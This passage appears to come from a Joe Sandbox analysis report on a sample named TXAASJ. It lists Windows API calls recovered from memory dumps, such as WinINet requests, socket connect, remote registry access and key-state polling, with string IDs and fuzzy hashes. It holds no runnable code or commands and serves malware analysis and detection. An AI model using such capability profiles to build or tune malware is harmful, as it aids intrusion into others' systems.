                                                                                                                        • Opcode Fuzzy Hash: 62348466fb1008419ecbe9c6d9d086940e824fd316f08e38675fac94cfec6b48
                                                                                                                        • Instruction Fuzzy Hash: F3418D71602206EFDF05CF56CC84B9A7BA9EF44354F1490EAEA09EF216D7B1D944CBA0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95A93
                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00E95AAF
                                                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00E95AF5
                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F118F0,00000000), ref: 00E95B3E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                        • Opcode ID: fa2eaec41bf38ecd027a3069a13e6ee758d21453f8dfd4b5fa894ccbcdfb8fd4
                                                                                                                        • Instruction ID: 2edae5484da7782c1bb93d3ec4bdea146892219846715c9c8d3e1643b9b794eb
                                                                                                                        • Opcode Fuzzy Hash: fa2eaec41bf38ecd027a3069a13e6ee758d21453f8dfd4b5fa894ccbcdfb8fd4
                                                                                                                        • Instruction Fuzzy Hash: B641C2322057019FDB11DF24D881B5AB7E8EF89324F045A1EF9A5AB2D1E770E804CB66
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00EB0478
                                                                                                                          • Part of subcall function 00E57F40: _memmove.LIBCMT ref: 00E57F8F
                                                                                                                          • Part of subcall function 00E5A2FB: _memmove.LIBCMT ref: 00E5A33D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$BuffCharLower
                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                        • API String ID: 2411302734-567219261
                                                                                                                        • Opcode ID: 5008c5ec6ad227d7a3afd40de084bbfc9889423412f7e39021693da14d7a8e41
                                                                                                                        • Instruction ID: fc2c12127b26d66fd8a765321469daf0404544f05a5048a533ce9735c17e17dc
                                                                                                                        • Opcode Fuzzy Hash: 5008c5ec6ad227d7a3afd40de084bbfc9889423412f7e39021693da14d7a8e41
                                                                                                                        • Instruction Fuzzy Hash: 4431AD70500619ABCF24EF98D8419EFB3F5FF05364B109A29E862BB6D1CB31E909CB40
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E8C684
                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E8C697
                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E8C6C7
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 458670788-1403004172
                                                                                                                        • Opcode ID: a37f0132d188b11de63a5b1ecf2d9e2503b03fa4433b4c49d4a6a53e3d1dec07
                                                                                                                        • Instruction ID: 84742535c59a0de1fe4e5e02846f6ee3da0b079dea9862e304da22e99f127b48
                                                                                                                        • Opcode Fuzzy Hash: a37f0132d188b11de63a5b1ecf2d9e2503b03fa4433b4c49d4a6a53e3d1dec07
                                                                                                                        • Instruction Fuzzy Hash: C721F671900104BEDB04BB64DC86DFFB7A8DF46714B206529F42AF31E1EB744D0AA760
                                                                                                                        APIs
                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EA4A60
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA4A86
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EA4AB6
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00EA4AFD
                                                                                                                          • Part of subcall function 00EA56A9: GetLastError.KERNEL32(?,?,00EA4A2B,00000000,00000000,00000001), ref: 00EA56BE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1951874230-3916222277
                                                                                                                        • Opcode ID: 9c96ff75b2afb2f0c740930b7f762b33fd17ff5705362029c28fc3403f40ac9e
                                                                                                                        • Instruction ID: 20bf22e8ae2e0e2e775578cf95dee833b58c92d5d4905b44a84c8021b83bf33f
                                                                                                                        • Opcode Fuzzy Hash: 9c96ff75b2afb2f0c740930b7f762b33fd17ff5705362029c28fc3403f40ac9e
                                                                                                                        • Instruction Fuzzy Hash: FA21B0B6544208BFE711DF659C85EBB77ECEB8E748F10511BF105BA180EAA4AD054770
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EC454E
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • _memset.LIBCMT ref: 00E53965
                                                                                                                        • _wcscpy.LIBCMT ref: 00E539B5
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E539C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                        • String ID: Line:
                                                                                                                        • API String ID: 3942752672-1585850449
                                                                                                                        • Opcode ID: 4cf6e0f381b27b796227fd7990092562b7a92f7734aa9ab77a1ac0157615edf6
                                                                                                                        • Instruction ID: 5c54212c96c8eae0f233af4d69f8dcc013ef9be90d5194852424228404353438
                                                                                                                        • Opcode Fuzzy Hash: 4cf6e0f381b27b796227fd7990092562b7a92f7734aa9ab77a1ac0157615edf6
                                                                                                                        • Instruction Fuzzy Hash: CD31B9714083446BD721EB60DC41FDB77E8BF84351F00991EFA85A21A1DB709B4CD792
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E6C657
                                                                                                                          • Part of subcall function 00E6C619: GetStockObject.GDI32(00000011), ref: 00E6C66B
                                                                                                                          • Part of subcall function 00E6C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6C675
                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EB8F69
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00EB8F70
                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EB8F85
                                                                                                                        • DestroyWindow.USER32(?), ref: 00EB8F8D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                        • String ID: SysAnimate32
                                                                                                                        • API String ID: 4146253029-1011021900
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00E99E85
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E99EB6
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00E99EC8
                                                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E99F02
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandle$FilePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 4209266947-2873401336
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E9E392
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00E9E3E6
                                                                                                                        • __swprintf.LIBCMT ref: 00E9E3FF
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00EEDBF0), ref: 00E9E43D
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                        • String ID: %lu
                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                          • Part of subcall function 00E8D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E8D640
                                                                                                                          • Part of subcall function 00E8D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E8D653
                                                                                                                          • Part of subcall function 00E8D623: GetCurrentThreadId.KERNEL32 ref: 00E8D65A
                                                                                                                          • Part of subcall function 00E8D623: AttachThreadInput.USER32(00000000), ref: 00E8D661
                                                                                                                        • GetFocus.USER32 ref: 00E8D7FB
                                                                                                                          • Part of subcall function 00E8D66C: GetParent.USER32(?), ref: 00E8D67A
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E8D844
                                                                                                                        • EnumChildWindows.USER32(?,00E8D8BA), ref: 00E8D86C
                                                                                                                        • __swprintf.LIBCMT ref: 00E8D886
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                        • String ID: %s%d
                                                                                                                        • API String ID: 1941087503-1110647743
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00E78768
                                                                                                                          • Part of subcall function 00E78984: __mtinitlocknum.LIBCMT ref: 00E78996
                                                                                                                          • Part of subcall function 00E78984: EnterCriticalSection.KERNEL32(00E70127,?,00E7876D,0000000D), ref: 00E789AF
                                                                                                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00E78775
                                                                                                                        • __lock.LIBCMT ref: 00E78789
                                                                                                                        • ___addlocaleref.LIBCMT ref: 00E787A7
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                        • String ID: P
                                                                                                                        • API String ID: 1687444384-1343716551
                                                                                                                        APIs
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EB18E4
                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EB1917
                                                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EB1A3A
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EB1AB0
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2364364464-0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00EBDFE5
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EBE01D
                                                                                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 00EBE058
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EBE079
                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EBE091
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188977179-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00EB05DF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EB066E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EB068C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EB06D2
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00EB06EC
                                                                                                                          • Part of subcall function 00E6F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00E9AEA5,?,?,00000000,00000008), ref: 00E6F282
                                                                                                                          • Part of subcall function 00E6F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00E9AEA5,?,?,00000000,00000008), ref: 00E6F2A6
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 327935632-0
                                                                                                                        • Opcode ID: ec39228ad1f697975e8daedf7718c0ffab0bcb294d5a7dcd450b1202c48abeeb
                                                                                                                        • Instruction ID: 69334bd5c0116aea4c81d804be851fb4e953145b5eda753612c13ac5089aea43
                                                                                                                        • Opcode Fuzzy Hash: ec39228ad1f697975e8daedf7718c0ffab0bcb294d5a7dcd450b1202c48abeeb
                                                                                                                        • Instruction Fuzzy Hash: FF514875A002159FCB00EFA8C8909EEB7F5EF48314B1494A6EA55BB361EB30ED49CF51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00EB3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB2DE0
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EB2E1F
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EB2E66
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00EB2E92
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EB2E9F
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3440857362-0
                                                                                                                        • Opcode ID: 80f6fa82dd66a1ea0371765e0cdcb6815a2982a3742f409d343d12a5d76b9e83
                                                                                                                        • Instruction ID: 098cb88749c4ca1383eb0c764fec9709763b421378a10fe74268a8d51905865f
                                                                                                                        • Opcode Fuzzy Hash: 80f6fa82dd66a1ea0371765e0cdcb6815a2982a3742f409d343d12a5d76b9e83
                                                                                                                        • Instruction Fuzzy Hash: 76515D71108204AFC705EF64CC91EABB7E9FF88304F14591EFA95A71A1DB31E909CB52
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ebf607ed62e4106561fc0728e3d88c2fd36a21f76f22de20c9d92a0041fb48c8
                                                                                                                        • Instruction ID: 9bf2295caab65627e60a9c28873066fd68aa0086ca87d5affb7de3d5424356b8
                                                                                                                        • Opcode Fuzzy Hash: ebf607ed62e4106561fc0728e3d88c2fd36a21f76f22de20c9d92a0041fb48c8
                                                                                                                        • Instruction Fuzzy Hash: FB412435908104AFD720DF38CC89FEABBA8EB09324F255666F969F72D1C7709D01DA50
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EA17D4
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EA17FD
                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EA183C
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EA1861
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EA1869
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1389676194-0
                                                                                                                        • Opcode ID: 92283434760a73ecd90f5973f171ccce0cccdb2d823bee0ecb60e41222752f40
                                                                                                                        • Instruction ID: e658b60ef5ce0b0a866fe8b4342684dd37394eb2388b47fc8331fa1608eb6509
                                                                                                                        • Opcode Fuzzy Hash: 92283434760a73ecd90f5973f171ccce0cccdb2d823bee0ecb60e41222752f40
                                                                                                                        • Instruction Fuzzy Hash: 51414635A00215EFCB15EF64C981AADBBF5FF08314B148499E81ABB361DB31ED05CB61
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(000000FF), ref: 00E6B749
                                                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00E6B766
                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00E6B78B
                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00E6B799
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4210589936-0
                                                                                                                        • Opcode ID: dde52922a242585efb4e5e9f9deb40df4840a0d0b47a53a628c2ba0dc50c1c91
                                                                                                                        • Instruction ID: 99a7222462757d8f04fdc0aa1dcef36b9ddd6290bd1a7e950b5bd20178ac81c7
                                                                                                                        • Opcode Fuzzy Hash: dde52922a242585efb4e5e9f9deb40df4840a0d0b47a53a628c2ba0dc50c1c91
                                                                                                                        • Instruction Fuzzy Hash: C7419C71504209FFDF159F64D984EEABBB4FB453A4F10531AF828B2290C731A990DFA1
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E8C156
                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00E8C200
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E8C208
                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00E8C216
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E8C21E
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3382505437-0
                                                                                                                        • Opcode ID: 1d0594362a5167cc50d89f2fb46c890466443485e9e40a9c56434b5f4aa7e18a
                                                                                                                        • Instruction ID: cac12b3d72b3641d30b126145ad552f3eab43110a635f1412d26fbf7d5904342
                                                                                                                        • Opcode Fuzzy Hash: 1d0594362a5167cc50d89f2fb46c890466443485e9e40a9c56434b5f4aa7e18a
                                                                                                                        • Instruction Fuzzy Hash: 1331C071501219EFDB04DFA8DD8CA9E3BB5EB05329F204215F929B71D1C7B09904CBA0
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00E8E9CD
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E8E9EA
                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E8EA22
                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E8EA48
                                                                                                                        • _wcsstr.LIBCMT ref: 00E8EA52
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3902887630-0
                                                                                                                        • Opcode ID: a4e38bc35a6f8aa2eaf9ffe65f8ab8b09089f50550f36b584d8b7a5ebcb3ab49
                                                                                                                        • Instruction ID: d83204c88ec80ba23b4eb6b103cb49c8ef2a94d07fd3199716cb0899f54179e1
                                                                                                                        • Opcode Fuzzy Hash: a4e38bc35a6f8aa2eaf9ffe65f8ab8b09089f50550f36b584d8b7a5ebcb3ab49
                                                                                                                        • Instruction Fuzzy Hash: C0212C71204200BEEB19AB69EC45E7B7BECDF45754F10D06AF80DEA151EA70DC408390
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EBDCC0
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EBDCE4
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EBDCFC
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00EBDD24
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00EA407D,00000000), ref: 00EBDD42
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2294984445-0
                                                                                                                        • Opcode ID: 94b59929d4df5eef2d75e8b93ecf1b99df1efb7180b419a5f475cfd9bba67a63
                                                                                                                        • Instruction ID: a3dbe74fbf0e28fbe5601de9059e1db808544169175ab45876eabaaf0488db00
                                                                                                                        • Opcode Fuzzy Hash: 94b59929d4df5eef2d75e8b93ecf1b99df1efb7180b419a5f475cfd9bba67a63
                                                                                                                        • Instruction Fuzzy Hash: AC21C471608216AFCB215F799C44BEA7BA8FB45378B115725F976E61E0E3709814CB80
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E8CA86
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E8CAB8
                                                                                                                        • __itow.LIBCMT ref: 00E8CAD0
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E8CAF6
                                                                                                                        • __itow.LIBCMT ref: 00E8CB07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53B1E: _wcsncpy.LIBCMT ref: 00E53B32
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00E96DBA
                                                                                                                        • GetLastError.KERNEL32 ref: 00E96DC5
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E96DD9
                                                                                                                        • _wcsrchr.LIBCMT ref: 00E96DFB
                                                                                                                          • Part of subcall function 00E96D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00E96E31
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00EAACF5
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EA9160
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA916F
                                                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00EA918B
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 00EA89CE
                                                                                                                        • GetForegroundWindow.USER32 ref: 00EA89E5
                                                                                                                        • GetDC.USER32(00000000), ref: 00EA8A21
                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00EA8A2D
                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00EA8A68
                                                                                                                        APIs
                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E6B5EB
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00E6B5FA
                                                                                                                        • BeginPath.GDI32(?), ref: 00E6B611
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00E6B63B
                                                                                                                        APIs
                                                                                                                        • __calloc_crt.LIBCMT ref: 00E72E81
                                                                                                                        • CreateThread.KERNEL32(?,?,00E72FB7,00000000,?,?), ref: 00E72EC5
                                                                                                                        • GetLastError.KERNEL32 ref: 00E72ECF
                                                                                                                        • _free.LIBCMT ref: 00E72ED8
                                                                                                                        • __dosmaperr.LIBCMT ref: 00E72EE3
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        APIs
                                                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E8B903
                                                                                                                        • GetLastError.KERNEL32(?,00E8B3CB,?,?,?), ref: 00E8B90D
